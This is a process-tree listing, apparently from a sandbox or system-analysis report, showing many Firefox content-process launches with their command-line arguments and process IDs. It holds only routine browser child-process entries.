C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.68.1261356786\414269249" -childID 65 -isForBrowser -prefsHandle 8680 -prefMapHandle 5540 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {484a7545-708f-4390-a2fc-eed8bdd47cc5} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8072 145dd0cdf58 tab
3⤵
PID:4892

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.71.931599462\5488257" -childID 68 -isForBrowser -prefsHandle 8220 -prefMapHandle 6500 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6f22f788-e456-4adf-9e33-bf408f01a497} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5092 145d2094158 tab
3⤵
PID:5824

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.70.1366854250\1269585926" -childID 67 -isForBrowser -prefsHandle 7964 -prefMapHandle 5076 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {69546b86-5f0d-429e-ae9b-b7ab223b5c53} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7992 145d2093558 tab
3⤵
PID:5428

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.72.577538885\2114539646" -childID 69 -isForBrowser -prefsHandle 8404 -prefMapHandle 10208 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1039f8c9-4901-42f4-a359-ced7d8856e4c} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 10196 145df592f58 tab
3⤵
PID:5472

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.73.624624570\409753362" -childID 70 -isForBrowser -prefsHandle 7388 -prefMapHandle 9988 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d334b36f-295f-48ad-bf66-47a52f5d8a6a} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6464 145dc369058 tab
3⤵
PID:4844

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.74.1965564333\519439806" -childID 71 -isForBrowser -prefsHandle 7480 -prefMapHandle 6660 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7a8caea4-84a8-45d1-b2f8-5b222107d02f} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 4224 145df612258 tab
3⤵
PID:2892

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.77.114611203\2130658725" -childID 74 -isForBrowser -prefsHandle 6656 -prefMapHandle 6652 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e457b820-7193-4680-bc6c-ecb3795f5101} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8068 145dc33de58 tab
3⤵
PID:448

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.76.69241513\1445341038" -childID 73 -isForBrowser -prefsHandle 10220 -prefMapHandle 10216 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a2ab6d92-233d-4941-96eb-7898460e94ec} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7020 145dc340558 tab
3⤵
PID:5232

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.75.545976873\1626508333" -childID 72 -isForBrowser -prefsHandle 7208 -prefMapHandle 6832 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aae1fe50-b645-45c0-9ed6-0775122c0a79} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 2656 145df53a158 tab
3⤵
PID:5252

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.78.1895477710\969349007" -childID 75 -isForBrowser -prefsHandle 10056 -prefMapHandle 8548 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca047762-be0d-46dd-8ca0-7c3ea6f429b8} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6496 145da5ddd58 tab
3⤵
PID:5528

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.79.1842082488\711092273" -childID 76 -isForBrowser -prefsHandle 7248 -prefMapHandle 6496 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {877463b3-0812-495e-9971-9d62964fa721} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6568 145df614058 tab
3⤵
PID:6004

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.81.1192316394\47151042" -childID 78 -isForBrowser -prefsHandle 8012 -prefMapHandle 6056 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {38e9eb5a-dcd2-4a44-8baa-96c3ff3ffe9b} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8700 145dd0a8858 tab
3⤵
PID:2724

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.80.180402727\1784631949" -childID 77 -isForBrowser -prefsHandle 10224 -prefMapHandle 10228 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c4771b84-aab2-4b61-b8f5-afb63ace6587} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5200 145dd0a6758 tab
3⤵
PID:384

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.82.1180427484\804597770" -childID 79 -isForBrowser -prefsHandle 9996 -prefMapHandle 7628 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eda20b89-d268-492c-9b24-77788c324ea1} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8644 145ddcab058 tab
3⤵
PID:5588

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.83.37613108\1882447201" -childID 80 -isForBrowser -prefsHandle 6324 -prefMapHandle 6360 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cceaccec-ad3e-4b3e-8c21-d63baae894ac} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8672 145d8710158 tab
3⤵
PID:5080

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.84.1272015041\906441470" -childID 81 -isForBrowser -prefsHandle 6964 -prefMapHandle 7928 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d07c6ced-f4b7-4213-b546-bd9a56eba104} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5808 145dcd24e58 tab
3⤵
PID:4828

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.86.1904061249\585747831" -childID 83 -isForBrowser -prefsHandle 7736 -prefMapHandle 5540 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e804e1af-0b9e-4e79-875b-bdeb2ace4857} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7608 145ddcab658 tab
3⤵
PID:6016

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.85.623418326\731285065" -childID 82 -isForBrowser -prefsHandle 8400 -prefMapHandle 408 -prefsLen 30564 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5ec81a2-e30a-444f-92d5-00aebe5c6005} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7432 145ddcabc58 tab
3⤵
PID:5148

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.87.740041458\1263764339" -childID 84 -isForBrowser -prefsHandle 10160 -prefMapHandle 10200 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d088844e-c215-4211-8186-84d5b6f58b38} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7700 145df53cb58 tab
3⤵
PID:5384

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.88.1184197466\144373688" -childID 85 -isForBrowser -prefsHandle 7840 -prefMapHandle 8968 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fa36089-ea0e-403c-8c2b-4fa0d07f14be} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7944 145df614958 tab
3⤵
PID:396

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.89.780061504\585669162" -childID 86 -isForBrowser -prefsHandle 5564 -prefMapHandle 10324 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e0d1d3c-edf5-40aa-b852-e7a01d3d27a5} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6484 145dd04cb58 tab
3⤵
PID:5288

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.90.378759386\1301040995" -childID 87 -isForBrowser -prefsHandle 10316 -prefMapHandle 7292 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b13bba4-2110-4eb3-aaf3-afe565d84254} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 9876 145dd04b358 tab
3⤵
PID:5524

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.91.1636627811\831973499" -childID 88 -isForBrowser -prefsHandle 3144 -prefMapHandle 8612 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {13d1d28b-f821-45fc-bc74-1061c3fb2c39} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 10116 145de03a958 tab
3⤵
PID:5696

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.92.2078811536\1242069827" -childID 89 -isForBrowser -prefsHandle 9596 -prefMapHandle 7556 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cd74b880-a6e3-4d70-9874-2157b662dace} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6500 145dd2fb858 tab
3⤵
PID:5468

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.93.1810664934\1901973646" -childID 90 -isForBrowser -prefsHandle 10224 -prefMapHandle 7964 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e622699c-3af6-41d2-b884-1fd34463be7f} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6996 145df47ff58 tab
3⤵
PID:5744

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.95.504575920\1036890924" -childID 92 -isForBrowser -prefsHandle 10536 -prefMapHandle 10540 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {efa13d67-4bf1-4eea-825b-37012443e1e3} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 10524 145e157de58 tab
3⤵
PID:5776

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.94.234828376\1242439833" -childID 91 -isForBrowser -prefsHandle 6588 -prefMapHandle 8220 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f02a9d0-1040-42ec-a366-3b35b9db555d} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 10200 145e0824f58 tab
3⤵
PID:2820

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.97.1025205329\1453156200" -childID 94 -isForBrowser -prefsHandle 10120 -prefMapHandle 8140 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42cddaf7-4a83-4229-8415-86e8bd053f46} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 10820 145e1ba4058 tab
3⤵
PID:2424

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.96.112268132\393597865" -childID 93 -isForBrowser -prefsHandle 10764 -prefMapHandle 10768 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {21528a39-e2c0-4cbf-b43d-1f04c2dce332} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 10592 145e1ba4f58 tab
3⤵
PID:5276

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.98.1757787660\584171779" -childID 95 -isForBrowser -prefsHandle 10592 -prefMapHandle 10768 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c8fa7bb-3707-4482-ae63-43329d192524} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7496 145e1eb1558 tab
3⤵
PID:5444

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.99.1040258222\552078782" -childID 96 -isForBrowser -prefsHandle 5556 -prefMapHandle 6388 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f309a40d-f4d5-4379-b3c5-dd33339b1803} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 8668 145d8abf558 tab
3⤵
PID:2872

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.100.2032025366\1968814826" -childID 97 -isForBrowser -prefsHandle 10568 -prefMapHandle 10992 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9333e6ef-4f6b-4382-8e00-2734b7a9c435} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7016 145d21baa58 tab
3⤵
PID:4456

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.102.813421935\937844814" -childID 99 -isForBrowser -prefsHandle 6860 -prefMapHandle 7716 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e56084c0-1746-4095-8e41-bf95d06fa05b} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 2960 145dde86a58 tab
3⤵
PID:4780

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.101.166951466\462990739" -childID 98 -isForBrowser -prefsHandle 9028 -prefMapHandle 6228 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {76fe4301-0196-4369-a1e0-fff05c6889ae} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 2440 145ddcaa158 tab
3⤵
PID:3236

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.103.601603807\1630526495" -childID 100 -isForBrowser -prefsHandle 7044 -prefMapHandle 8412 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {49e2324c-af41-40f8-a884-574e919c0758} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 10332 145d8ac1f58 tab
3⤵
PID:4252

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.106.696471136\676392274" -childID 103 -isForBrowser -prefsHandle 11012 -prefMapHandle 4484 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2fb6cec0-6955-406b-9a3a-71d6653e00aa} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 11016 145e21ef258 tab
3⤵
PID:3632

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.105.1711270944\166608913" -childID 102 -isForBrowser -prefsHandle 11056 -prefMapHandle 11052 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9bbda6ee-d072-45d7-8da2-e17ce396890f} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 11064 145e21edd58 tab
3⤵
PID:5748

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.104.961488969\1498037972" -childID 101 -isForBrowser -prefsHandle 4468 -prefMapHandle 2884 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3495d956-1e27-45c0-8aa0-6702c14c2cbd} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 10208 145de7d7b58 tab
3⤵
PID:4280

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.107.1000860152\240583056" -childID 104 -isForBrowser -prefsHandle 5924 -prefMapHandle 5072 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {26b3986e-a91f-487e-9006-23f5ae758fed} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 1448 145de1f0558 tab
3⤵
PID:928

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.108.619632427\2069598032" -childID 105 -isForBrowser -prefsHandle 10116 -prefMapHandle 10412 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f12eb773-57ec-4736-b5c2-5ce36ea1cbe8} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 10552 145e26fb858 tab
3⤵
PID:3548

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.109.171393821\1329672300" -childID 106 -isForBrowser -prefsHandle 6904 -prefMapHandle 7012 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ea84f69-9e1e-4102-b917-88bc70c7f773} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6264 145e1ccae58 tab
3⤵
PID:1660

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.111.904716474\579569382" -childID 108 -isForBrowser -prefsHandle 11172 -prefMapHandle 5868 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {24bc403f-32b9-4407-8aae-d57d8d330b37} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6840 145da67c258 tab
3⤵
PID:3144

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.110.172565343\728102043" -childID 107 -isForBrowser -prefsHandle 11176 -prefMapHandle 11180 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b33e0ec2-f85f-4eed-ae2b-38377cbfcc21} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 9588 145da67dd58 tab
3⤵
PID:4872

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.114.1703082620\364418371" -childID 111 -isForBrowser -prefsHandle 11180 -prefMapHandle 11176 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2a450ae-973d-4c4d-9e79-6924674be365} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 10828 145e2a86758 tab
3⤵
PID:948

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.113.510873719\1116210648" -childID 110 -isForBrowser -prefsHandle 7932 -prefMapHandle 8532 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {38dd7708-4f12-498e-a95b-af05d4bd8b6e} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 4764 145e2a85858 tab
3⤵
PID:1720

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.112.1649834319\957854052" -childID 109 -isForBrowser -prefsHandle 2868 -prefMapHandle 10796 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5eeb6ee-7184-49f9-839e-dbce2c4f646d} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 6896 145e2a85558 tab
3⤵
PID:5992

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.115.2029834848\1241103700" -childID 112 -isForBrowser -prefsHandle 9600 -prefMapHandle 7624 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc7c1065-24d6-4f9c-9d5e-c8e16b11473c} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 5840 145e1a3a658 tab
3⤵
PID:3108

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.116.1182989324\1253273616" -childID 113 -isForBrowser -prefsHandle 5496 -prefMapHandle 11104 -prefsLen 30573 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {83460933-a014-47b9-ae70-93e61c7bafc1} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 10136 145de3a1f58 tab
3⤵
PID:5592

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.117.1245617504\1032144071" -childID 114 -isForBrowser -prefsHandle 10428 -prefMapHandle 5664 -prefsLen 31121 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2f22447a-0194-4c8d-873e-5c450abe85a9} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 7264 145e26fc758 tab
3⤵
PID:2068

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4956.118.1891064745\1276732160" -childID 115 -isForBrowser -prefsHandle 8728 -prefMapHandle 8704 -prefsLen 31121 -prefMapSize 232675 -jsInitHandle 1484 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d950508d-0bd2-4103-8e9a-a2282dbc69f0} 4956 "\\.\pipe\gecko-crash-server-pipe.4956" 10828 145e199d158 tab
3⤵
PID:5340

C:\Program Files\Mozilla Firefox\firefox.exe
